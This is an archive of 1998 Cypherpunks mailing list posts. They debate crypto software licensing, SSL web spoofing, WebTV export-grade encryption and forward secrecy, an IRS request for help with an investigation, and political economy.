> necessary nor sufficient to achieve "strong crypto". Not really sure why
> you're arguing in that case.

I don't think anyone suggesed that closed source deployment was in
anyway better than open source, and obviously open source is better
for verifying the quality of crypto software.

However, as was previously suggested, if deployment is the goal, and
if one uses for example a GNU license it tends to discourage
commercial (typically closed source) deployers, and as Lucky said:

: Many companies will not be able to source contaminated by GNU-style
: licensing restrictions. Consequently, alternatives would be
: found. Some of those alternatives, include using no crypto at all or
: using crypto written by somebody that does not understand
: crytography.  Hardly the outcome a Cypherpunk would desire.

And I think at this stage something is vastly better than nothing.

> > You don't get it, but then have you ever written any crypto code with
> > the objective of undermining the power of the state?  Is this your aim
> > in writing your open source application code that you name dropped?
> 
> Yes, and yes. 

Cool, what application area are these in?  Got a URL?

> (I don't think you understand the term "name dropped" btw.  

Just a comment on the Rick Smith (of Secure Computing) syndrome (read
crytopgraphy list you'll know about the book he wrote, because every
other post he makes involves it).  Perhaps not appropriate in your
case, but if people mention software, it is nice to know some details:
why should we be interested in your software etc.

> But given the name-dropping and appeal-to-authority tone of your
> whole post, I wonder if you understand the term "irony").

Irony?  Your post was intended to be ironic?  What is ironic about
arguing that first cut security is more important than deployment?

This is cypherpunks, people tend to speak their mind, and usually
aren't too delicate about it -- welcome to the cypherpunks list.

Adam
-- 
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 9 Oct 1998 04:36:48 +0800
To: fod@brd.ie
Subject: HTTPS:// hyperlink spoofing (Re: propose: `cypherpunks license')
In-Reply-To: <361CE49F.C858A2CE@brd.ie>
Message-ID: <199810081956.UAA14156@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Frank O'Dwyer writes:
> In fact, it's funny that you tout a "secure web server" as "strong
> crypto" since in that context SSL is usually vulnerable to being
> end-run by web spoofing. Oops. Oh well, it uses strong crypto, so it
> must be good.

As to your web spoofing comments, (which I just read, see:

	http://www.brd.ie/papers/sslpaper/sslpaper.html

) this is a specific instance of the mapping problem, ie. how do you
know that the web page you ended up at belongs to the company you
heard about, or found by a web search or hypertext link on someones
page.  The hierarchical CA model says that you believe it is so
because the CA tells you it is so.

(Franks comment on the (in)security of following an unsecured
hypertext link was that the unsecured hypertext reference could be
modified in an active attack to point to their own (secured) page, and
then accept your payment instead of the company you intended to buy
from).

Netscape 4 behaves in the following way, depending on the situation.

1) the site is using a cert signed by a CA the browser does not
recognise

In this case it shows you through a nice series of dialog box (in
microsofts wizard style), which is quite useful in explaining the
issues.

2) the site is using a cert signed by a CA the browser does recognise

In this case the browser does one of two things depending on whether
you are currently viewing a secure page, or not:

a) from insecure page shows dialog box telling you you are visiting a
secured page, and to click security for more info (clicking security
will show you the cert content, company name, CA details).

b) from secure page shows _nothing_, just goes right into the page
without further comment!  (default setup, freshly installed netscape
4.04 / linux).

(I tried this going from c2net, then typing in cypherpunks.to (Lucky's
site)), if you do click on security button you then get the cert info
again.

  www.cypherpunks.to
  Cypherpunks Jihad
  Cypherpunks Tonga
  Cyberspace, none, TO

Part b) I view as a problem because it doesn't even by default show
you anything.  They could at least present the click through.  They
seem to be treating the secure / insecure as a binary state.

Could someone verify this in later revisions of netscape?

The basic problem though is that even if you do the `nagging dialog
box' click throughs with option to disable, chances are most people
will disable them, because they will get annoyed.

The simplest way to reduce this risk would be for a company to secure
all of it's web pages.  But this isn't going to do that much, because
people often don't know the web page URL.  (Frank notes all this).

Also spoofed company names which look similar to companies in real
life also are possible, for example there was a case of a BT Telekom
or something trying to spoof customers into parting with their money.
This is a problem with gullible consumers.

But if people started from print media advertisement, and typed in the
URL and the URL was signed by a CA then they are at least as secure as
the non-net situation.

In general though, I think there is a solution to this problem:
encrypt all the pages.

The other hard problem is now that you know you are visiting the web
page of FooBar Inc, as attested by Thawte (or whoever), how do you
know that FooBar won't take your money and run.  This is a general
reputation question, with the normal solutions.  If it's an expensive
item, you perhaps check them out, ask around for others experiences,
check with any reputation ratings services (trade groups, etc).

Adam
-- 
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 9 Oct 1998 09:24:15 +0800
To: rms@gnu.org
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810090024.UAA02187@psilocin.gnu.org>
Message-ID: <199810090102.VAA05952@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain




Richard Stallman writes:
> Since you've quoted Juliet, let's look at what she is really saying.
> 
> Your topic is terminology and whether it matters, but Juliet has other
> concerns on her mind.  She uses Romeo's family name as a figure of
> speech, a stand-in for his family.  When she says his name is
> unimportant, she really means that his family ties should be
> unimportant.

There are many layers of meaning. There is Juliet, a fictional
character, who means something, in saying what she said. There is
Shakespeare, the writer, who meant something in writing the play as he
did. Then there is Perry Metzger, who obviously meant something in
quoting Shakespeare putting words into Juliet's mouth.

As entertaining as literary deconstruction can be, what is
interesting here is not what Juliet meant, but what Perry Metzger
meant in quoting Juliet.

> It's the same for "open source" and "free software".  They refer to
> the same software, but say very different things about it.  So how
> about giving people an accurate idea of what I say?  Even if you don't
> agree with me, you can still do that.

	"I don't know what you mean by `glory',", Alice said.

	Humpty Dumpty smiled contemptuously. "Of course you don't --- till I
	tell you. I meant `there's a nice knock-down argument for you!'"

	"But `glory' doesn't mean `a nice knock-down argument'," Alice
	objected.

	"When *I* use a word", Humpty Dumpty said, in rather a scornful tone,
	"it means just what I choose it to mean -- neither more nor less."

	"The question is", said Alice, "whether you *can* make words mean so
	many different things"

	"The question is", said Humpty Dumpty, "which is to be master --
	that's all."

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 9 Oct 1998 10:22:22 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: I thought of an initialy regulated industry!... (fwd)
Message-ID: <199810090204.VAA22645@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 09 Oct 1998 01:39:08 +0000
> From: Michael Hohensee <mah248@is9.nyu.edu>
> Subject: Re: I thought of an initialy regulated industry!... (fwd)

> > > Absolutely nothing.  That's my point, not yours --or at least not the
> > > point you made in your previous post.
> > 
> > It is *exactly* the point I have made from day 1.
> 
> It would appear that Jim either cannot read his own posts (and this may
> well be, as I had a hard time deciphering the exact meaning of that last
> paragraph-sized sentence), or simply cannot remember them.  He certainly
> seems to have a problem with reading the posts of others.

Here is my position. I am pro nuke. Even given the lethality of the
compound and the costs related to disposal it still represents a better
investment of resources and human lives than natural oil, gas, etc.

Yes coal plants use and put out heated water, and yes it effects the
environment. Yes nuclear plants put out as much water as coal plants. It
still represents the major constituecy efluent from a nuclear plant in
regards environmental hazard. The only real question I had regarding nuclear
plants versus coal was the water retention process and the manner in which
nuclear plants process it (there is a question related to comparing coal to
nukes that takes this into account). I was under the (now apparently mistaken)
impression there was a regulation that seperated the core cooling water from
the energy regeneration system driving the turbines (which drive the
generators). The actual process is to release that water slowly over time
into the normaly non-radioactive effluent. Coal plants on the other hand do
put out over 300,000 tons of solid waster per year for a 1000MW plant. This
posses a much higher health hazard (irrespective of some parts per billion
contaminant that is the most toxic substance known to man) than the .5 tons
of solid waste a nuclear plant puts out.

Yes there are stupid laws regarding private processing of nuclear fuel. No,
I don't support them and *nothing* I ever said can be construed that way.

> I'm being to him --flaming him for no good reason! (it's true, there
> isn't a good reason for flaming one such as Jim, they have no effect
> --but it is somewhat cathartic).  While being certain to avoid
> responding to anything in my previous two posts --or at least not in a
> way that makes any sense.

Um, to be absolutely accurate, I have only 'flamed' a few people on this list
ever. Tim May, Perry Metzger, Micheal Frumkin, Adam, a couple of others I don't
remember at the moment. I did it in only one or two instances (Hi Timmy!)
toward any one person. I think the most offensive statement was calling Perry
Metzger a son-of-a-bitch one time because of a particular self-centered
comment he'd made. That was '93 I think, check the archives.

I don't believe I've ever flamed you. And don't intend to now.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 9 Oct 1998 13:07:47 +0800
To: "William H. Geiger III" <petro@playboy.com>
Subject: Re: Another potential flaw in current economic theory... (fwd)
In-Reply-To: <v04011701b2404f900352@[206.189.103.244]>
Message-ID: <3.0.5.32.19981008211304.008dce10@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



Throwing my two cans of petrol on the fire....

>>	Libertarians are just cowardly anarchists, they lack the courage of
>>their convictions to take the last step and eliminate government

Libertarians range from fat-minarchists to minimal-minarchists
to propertarian anarchists to even some non-propertarian anarchists.
Some of them insist on ideologic purity before working together
with anyone else, others don't.  Personally, I'm in the camp that
says that once we've eliminated the first 90% of the government,
we can get to work on eliminating the next 90%, and then it'll 
be a good time to argue about ideological purity because we'll
all be enough safer and more prosperous that even if we don't
get all the disparate things we want, we'll be in the position
of dodging ranting ideologues instead of cops.

Petro, mixing up minarchists and libertarians, says
>> Libertarians are just cowardly anarchists, 
>> they lack the courage of their convictions to take the last step and 
>> eliminate government altogether.
Eliminating governments is a lot harder than disavowing them.

Geiger, who's never tried large-scale anarchism, says
> Anarchism does not work. It is a pipe dream much like Communism that only
> leads to Totalitarianism.
while meanwhile claiming that the
> Constitutionally limited government
of the US would maximize personal freedom.

Choate, who's never tried large-scale free markets, says that
free markets don't work, and lead inevitably to monopoly,
and therefore we ought to use governments monopolies on force to prevent
markets from being free to prevent businessmen from forming monopolies,
as if governments could overcome temptations that businessmen can't.

Stewart, who's never tried large-scale pragmatism, though he's
watched other people try it, says that
the moral case for government is untenable, even if it's
going to take a long while before enough people stop believing
it and it goes away, and getting a Libertarian Party elected
may be a good thing to do in the meantime, just as the 
US Constitution and the Articles of Confederation were useful
though temporary stopgaps to keep the Brits out and 
slow down their Federalist replacements.





				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 9 Oct 1998 04:05:31 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810081921.VAA06626@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



HOW MUCH CODE DID 'CYPHERPUNK' TIM MAY EVER WRITE?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 9 Oct 1998 05:11:40 +0800
To: petro@playboy.com
Subject: does Web TV use forward secret cipher-suites? (Re: Web TV with 128b exported)
In-Reply-To: <v04011703b242b48621e3@[206.189.103.230]>
Message-ID: <199810082026.VAA14458@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Petro writes:
> At 2:39 PM -0500 10/7/98, Steve Bryan wrote:
> >David Honig wrote:
> >
> >>I'd guess that the Export control puppets know that the Web-TV hubs will
> >>be subpoena-able by the US even in these other "sovereign" nations.
> >>The WebTV centralized infrastructure makes this easy.

This is as others have noted cisco's doorbelling approach to GAK --
having routers and automated systems doing decryption, and allowing
LEA either direct access (possibly in this case), or access via
complicit operators.

One question which might help determins just how bad this Web TV thing
is, is does it use the forward secret ciphersuites.

If it did use FS ciphersuites, if the LEA starts reading traffic after
some point (by asking the WebTV operators to do so, or by using a
special LEA operator mode), he can't get all old traffic.

The EDH (ephemeral DH) modes are forward secret because a new DH key
is generated for each session.

Some of the RSA modes are forward secret, but only on export grade RSA
key sizes (512 bit).

As it got export permission, I fear the worst.  Perhaps even special
LEA operator access.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Fri, 9 Oct 1998 13:07:38 +0800
To: "'Cypherpunks Distributed Remailer'" <cypherpunks@einstein.ssz.com>
Subject: RE: I thought of an initialy regulated industry!... (fwd)
In-Reply-To: <361D693C.54152DAA@is9.nyu.edu>
Message-ID: <001301bdf341$3b8f1ae0$6d8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Michael Hohensee:

 
: It would appear that Jim either cannot read his own posts (and this may
: well be, as I had a hard time deciphering the exact meaning of that last
: paragraph-sized sentence), or simply cannot remember them.  
: He certainly seems to have a problem with reading the posts of others.
..........................................


A word to the wise (& argumentive):  check the archives.

     ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 9 Oct 1998 04:11:43 +0800
To: Jeff.Gordon@inspection.irs.gov
Subject: Re: Request for Assistance
Message-ID: <199810081936.VAA07537@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



You mean to tell me that the GOV is actually going to try to make a
case against someone on *this* mailing list for sending threatening
mail?  Gimme a break!  Have you actually perused any archives of
this list?  If you did, and filtered out any of the crypto/privacy-relevant
posts, you'd be hard pressed to find *anything* that you could take
seriously at all, let alone construe to be threatening.  Unless of course
you take space aliens hiding your drugs to be threatening.

And what, you're from the IRS?  What, was the IRS threatened?  And
this would surprise you how?  Did they threaten to hide the IRS' drugs?
Were they posing as space aliens?  And how come you didn't contact
me?  Does that mean that I'm under investigation?  Or do you just not
like me?  Or were you not sniffing my network connection at the time
to make your illegal determination that I'm on the Cypherpunks mailing
list?

I'd have to agree with Mr. 'X' that you guys have a lot of nerve coming
to this list and asking for assistance in what's probably an illegal
and illegitimate investigation in the first place, looking to claim another
victim in the seemingly never-ending destruction of the rights
of the common man by the faceless fascist government regime.

Or, to sum up, piss off.


At 12:17 PM 10/8/98 -0600, X wrote:
>Jeff,
>
>Good luck in your pursuit.  I think, in the future, you might want to offer
>us the customary 800 number to call you on to rat on our acquaintances.
>
>Two things worry me about your approach:
>
>1) how do you know what emails I get and why in the world do you think it's
>any of your business?
>
>2) is this suspicion by acquaintance?
>
>I'm sure you already know this, but I just recently joined the list so I
>know nothing about anything threatening on this list.  The biggest threat I
>see is from people publicizing that the government is sniffing out email
>addresses and categorizing them based on what they _receive._
>
>Dangerous pursuit, dangerous precedent.
>
>Watch what side you're on.
>
>X
>
>(although I have to admit, you have a lot of guts to come in here and ask
>'free-thinking individuals" to help you gang up on a guy.)
>
>~> -----Original Message-----
>~> From: Gordon Jeff INSP [mailto:Jeff.Gordon@inspection.irs.gov]
>~> Sent: Thursday, October 08, 1998 8:42 AM
>~> To: 'm1tca00@frb.gov'
>~> Subject: Request for Assistance
>~>
>~>
>~> Hello,
>~>
>~> The IRS and United States Attorney's office are looking for assistance
>~> in a criminal investigation involving threatening messages which were
>~> posted to the Cypherpunks mailing list.  This e-mail address was noted
>~> to be one of those which receives the Cypherpunks list.  I would
>~> appreciate it if you would contact me to discuss whether you would be
>~> willing to assist us in this matter, and what records or information you
>~> have relating to the Cypherpunks list.  You can contact me at this
>~> e-mail address or at (503) 326-2787.
>~>
>~> Thanks
>~>
>~> Jeff
>~>
>~>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Campbell <rick@campbellcentral.org>
Date: Fri, 9 Oct 1998 10:43:29 +0800
To: rms@gnu.org
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810090025.UAA02286@psilocin.gnu.org>
Message-ID: <199810090225.WAA06475@germs.dyn.ml.org>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3997.1071713808.multipart/signed"

--Boundary..3997.1071713808.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

    Date: Thu, 8 Oct 1998 20:25:25 -0400
    From: Richard Stallman <rms@gnu.org>
    
        Public Domain status denotes more freedom than GPL.  It allows all of
        the freedom of GPL and in addition, it allows the freedom of making
        proprietary modifications.
    
    Public domain gives person P the ability to make modified versions and
    give users no freedom in using them.  The result is that people in
    general have less freedom.

Your presentation confuses two different pieces of software.

It is only the derivative work which has less freedom associated with
it.  It remains the case that the person releasing their software to
the Public Domain has given the users of the software that is released
into the Public Domain more freedom to do as they will with that
software.

By releasing into the Public Domain, the author gives up the power to
control other people's activities and allows them to make different,
derived, software which might not have the same level of freedom.
However, such activities do not detract from the freedom that remains
associated with the software that was released into the Public Domain
-- freedom that is taken away by the GPL.

And while some derivative works may be proprietary, it's not uncommon
for other derivations to remain in the Public Domain.  CMU Common Lisp
is an example that comes to mind.  Whether or not Lucid, Allegro, or
any other proprietary system ever made use of any CMU Common Lisp code
has not detracted from the code released into the Public Domain.  This
code continues to be maintained, enhanced, ported to new platforms,
etc.

			Rick


--Boundary..3997.1071713808.multipart/signed
Content-Type: application/octet-stream; name="pgp00003.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00003.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zaWEK
Q29tbWVudDogUHJvY2Vzc2VkIGJ5IE1haWxjcnlwdCAzLjQsIGFuIEVtYWNz
L1BHUCBpbnRlcmZhY2UKCmlRQ1ZBd1VCTmgxMExCSWU5MVViOERjRkFRSEtD
QVFBdUVLUEYvVHYwK3lIU2NzTC9jeWFua2V2M0pXR2IyaXgKMUlPd05rbjhl
a3o4R2IydFhtRHV2RXZIbW5ONEJjczJLaHo2YmdhS0JRL2hXa3NQQlZVcStY
NmZ3QWVzTWptdAplN2FtMmxOS1M2V1JCMzF2UEdkVUFRb08xTUoxNzNlVmpR
S1hvRVByNzB0Qlc1dGQvY0JHUnE3YmFoMXAzRVpKCkk0OGtKMkk1ZC9JPQo9
TEdKbQotLS0tLUVORCBQR1AgTUVTU0FHRS0tLS0tCg==
--Boundary..3997.1071713808.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 9 Oct 1998 05:03:41 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810082030.WAA12450@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Is there an offhand reference to ECHELON in the second paragraph?


 

National Counterintelligence Center
Counterintelligence News and Developments
Volume 3 September 1998
------------------------------------------------------------------------

http://www.nacic.gov/cind/SEPT98.htm


More on French Spying

The French magazine Le Point reported in mid-June that France
systematically listens in on the telephone conversations and cable traffic
of many businesses based in the United States and other nations. The
article also reports the French Government uses a network of listening
stations to eavesdrop and pass on commercial secrets to French businesses
competing in the global economy.


The article goes on to state that the French secret service, DGSE, has
established listening posts in the Dordogne (Southern France) and also in
its overseas territories, including French Guiana and New Caledonia. The
article attributes to an unnamed "senior official within this branch of the
French secret service" the claim, "This is the game of the secret war,"
adding that U.S. listening posts do the same. The magazine report says
Germans who bought into the French Helios 1A spy satellite system are being
given access to political and economic secrets as part of a Franco-German
agreement to compete with a commercial information agreement between the
United States and Britain. 




------------------------------------------------------------------------


Mexican Hackers 
Mount Attack





According to an August 1998 Reuters report, a small group of computer
hackers have declared electronic war on the Mexican state. They have
plastered the face of revolutionary hero Emiliano Zapata on the Finance
Ministry's Web site and claim to have monitored visits by Mexican Senators
to X-rated Internet sites. They also have vowed to attack official
databases for incriminating numbers and publicize government bank accounts,
cellular phone conversations, and e-mail addresses. So far the cyber
pirates, who say they are a trio of Mexicans, appear to be more a nuisance
than a serious threat, but they are serving as a wake-up call for computer
security in Mexico, experts said. One of the hackers stated during an
online interview with Reuters that "We protest with the weapons we have and
those weapons are computers." The hackers surfaced in February when
visitors to the Finance Ministry's official Web site were surprised to find
Zapata staring back at them.






  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Fri, 9 Oct 1998 06:50:44 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810081945.UAA14149@server.eternity.org>
Message-ID: <361D3BD9.328931B5@brd.ie>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back wrote:
> You seem to be
> arguing that the primary goal should be to have best security, from
> the outset.  ie one gets the impression from reading your previous two
> posts that you consider ultimate security more important than
> deployment.  If this is what you are saying, I disagree.

No, I am arguing that if deployment of privacy is your goal, then you
need _some_ base level of security before you've really deployed
privacy. Deploying crypto is not the same thing. I do agree that it's
important to get stuff "out there" in whatever form (partly to get it
fixed, but mainly so it can't be shut down). I just think the closed
source route is a dead end. I also think that the free crypto libraries
exist, and now it would be nice to see free crypto applications. By that
I mean turnkey stuff with Windows installation programs and GUIs that
normal people can use--and *source* (turnkey for developers too). Make
it easy to have privacy, basically.

[...]
> if people mention software, it is nice to know some details:
> why should we be interested in your software etc.

Well, it's early days (I am just designing and prototyping now), but my
goal is to make a decentralised secure messaging client that ordinary
ISP users can use without any special resources. Something like icq, but
with crypto and without any central server, the intention being that it
would be easier to set up and harder to filter or shut down. I have in
mind an abstract messaging service that can be extended to use whatever
channel or drop-point happens to be available (e.g. irc, direct sockets,
email, remailers, ftp, usenet, intermediaries, icq). So for example you
could use irc just to rendezvous with someone (or meet them in the first
place), then use diffie-hellman to establish a private channel for a
real-time chat, then subsequently use an ftp site or a newsgroup to
exchange offline messages. The challenge is to make this easy. It's
something I want for myself, but I figure with the addition of a nice
GUI and an installer etc., it could be of wider interest. (And no, I
have no idea when I'll have some code to show, but I guess now I've
mentioned it I better finish it :)

Cheers,
Frank O'Dwyer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 9 Oct 1998 08:09:09 +0800
To: fod@brd.ie
Subject: importance of GUIs / secure distributed IRC (Re: propose: `cypherpunks license')
In-Reply-To: <361D3BD9.328931B5@brd.ie>
Message-ID: <199810082259.XAA15504@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Frank writes:
> I do agree that it's important to get stuff "out there" in whatever
> form (partly to get it fixed, but mainly so it can't be shut down).

Yup, so it can't be shut down is what I was getting at.

> need _some_ base level of security before you've really deployed
> privacy. Deploying crypto is not the same thing. 

Well if you personally have any influence over the design or code,
make it as secure as you can, forward secrecy, generous key sizes,
decentralised design, source code included etc.  I'd take that as a
given.

But I think a company slotting crypto into a product, or re-selling a
crypto application (like say Stronghold) is useful too, and doesn't
conflict with the first aim.  I don't think anyone is proposing not
distribute code, rather just noting that encouraging companies to
include crypto in their applications where they would not otherwise do
so all helps.  And in general a free-er license means more people will
use the code.

> I also think that the free crypto libraries exist, and now it would
> be nice to see free crypto applications. By that I mean turnkey
> stuff with Windows installation programs and GUIs that normal people
> can use--and *source* (turnkey for developers too). Make it easy to
> have privacy, basically.

This is all important, I agree.  Many cypherpunks type coding efforts
end up being usuable only by unix hackers, or whatever.  eg Magic
Money by pr0duct cypher.

As I think someone noted recently this tends to happen because the fun
part to the coder is implementing the crypto part and getting it
working.  After that GUIs and stuff is boring slog, so tends to not
get done.

> > if people mention software, it is nice to know some details:
> > why should we be interested in your software etc.
> 
> Well, it's early days (I am just designing and prototyping now), but my
> goal is to make a decentralised secure messaging client that ordinary
> ISP users can use without any special resources. Something like icq, but
> with crypto and without any central server, the intention being that it
> would be easier to set up and harder to filter or shut down. 

OK, I take it back... you are a cypherpunk after all :-)

Some people are working on this, I seem to be getting Cc'd on their
discussions, which included lately a reasonably detailed spec.
Perhaps you could merge projects.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 9 Oct 1998 13:25:48 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Another potential flaw in current economic theory... (fwd)
Message-ID: <199810090511.AAA23308@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 08 Oct 1998 21:13:04 -0700
> From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: Another potential flaw in current economic theory... (fwd)

> Choate, who's never tried large-scale free markets, says that

Actualy it's how I make my living, supporting those large scale markets (I
won't argue the free part).

> free markets don't work, and lead inevitably to monopoly,
> and therefore we ought to use governments monopolies on force to prevent

Where do I *ever* say we need 'government' monopolies. Not once, not ever.
I have said, and stand by it now, that what is needed is an *impartial* 3rd
party. That does *NOT* equate to 'the government'.

What is important to my thesis is that the regulator is impartial.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 9 Oct 1998 16:31:19 +0800
To: Steve Bryan <cypherpunks@toad.com
Subject: Re: Web TV with 128b exported
In-Reply-To: <3.0.5.32.19981007090445.008903c0@m7.sprynet.com>
Message-ID: <3.0.5.32.19981009010603.008f8100@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:39 PM 10/7/98 -0500, Steve Bryan wrote:
> David Honig wrote:
> > I'd guess that the Export control puppets know that the Web-TV hubs will
> > be subpoena-able by the US even in these other "sovereign" nations.
> > The WebTV centralized infrastructure makes this easy.
>
> This announcement seems to be getting a lot of this sort of reaction but I
> don't see quite why the news is greeted with such animosity.  If a duly
> authorized search warrant is required in order to obtain information that
> represents a potential world of difference from having unrestricted ability
> to monitor all communications.

Who would you execute the search warrant _on_?  The web site and the
browser user?  (Then why not let Netscape and IE export 128-bit?)
Or some third party who has access to something in the middle
(and may not be picky about search warrants, and may not have as much
standing to resist a court order or subpoena) ?
Or is the WebTV 128-bit code crippleware, using some backdoor key
or other hole for police to break in?

Basically, it just sounds fishy.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@is9.nyu.edu>
Date: Fri, 9 Oct 1998 09:54:34 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: I thought of an initialy regulated industry!... (fwd)
In-Reply-To: <199810082107.QAA20666@einstein.ssz.com>
Message-ID: <361D693C.54152DAA@is9.nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Thu, 08 Oct 1998 19:58:31 +0000
> > From: Michael Hohensee <mah248@is9.nyu.edu>
> > Subject: Re: I thought of an initialy regulated industry!... (fwd)
> 
> > > What specificaly is there about the relationship between natural gas and
> > > gasoline that leads you to believe that the comparison of lethality between
> > > the waste products of a coal plant vurses a nuclear plant is such that the
> > > waste of a nuclear plant is more lethal because there is more toxic
> > > byproduct and it is in higher concentrations?
> >
> > Absolutely nothing.  That's my point, not yours --or at least not the
> > point you made in your previous post.
> 
> It is *exactly* the point I have made from day 1.

It would appear that Jim either cannot read his own posts (and this may
well be, as I had a hard time deciphering the exact meaning of that last
paragraph-sized sentence), or simply cannot remember them.  He certainly
seems to have a problem with reading the posts of others.

> If you believe otherwise the mistake is yours.
> 

Isn't it nice the way Jim avoids having to argue intelligently?  He can
just take the first statement that someone makes, delete everything else
after it, and proceed to do nothing but offer a contradiction.  He seems
to think that this action is sufficient to make him right, and his
opponents wrong.  Oh well, if it makes him feel better, who am I to
argue?  I certainly can't carry on an intelligent conversation with him.

Now watch Jim's response to this message.  He will:

A:  Ignore it entirely, as is often the wont of people who have no
rational argument to make, and who realize they've painted themselves
into a corner.

B:  Reply, but cut out large portions of this post, and respond with a
few trite phrases which prove absolutely nothing but assuage his ego.

C:  Reply, include all of this post, and proceed to whine about how mean
I'm being to him --flaming him for no good reason! (it's true, there
isn't a good reason for flaming one such as Jim, they have no effect
--but it is somewhat cathartic).  While being certain to avoid
responding to anything in my previous two posts --or at least not in a
way that makes any sense.

Of course, I could be wrong.  Jim *could* choose option:

D:  Re-reply to my previous post, and address the arguments which he so
conveniently chopped out this time.

But given his track record so far, I doubt it.

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Fri, 9 Oct 1998 18:00:10 +0800
To: "'Steve Mynott'" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A33@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




Not really, the state holds a monopoly on "legal" force, whereas the
Mafia and other black-market organizations do not. What is interesting
is they use force often because they cannot use the government legal
system to arbitrate their disputes.

	Matt

> -----Original Message-----
> From: Steve Mynott [mailto:stevem@tightrope.demon.co.uk]

> On Thu, Oct 08, 1998 at 04:14:32PM -0700, Matthew James Gering wrote:
> > 
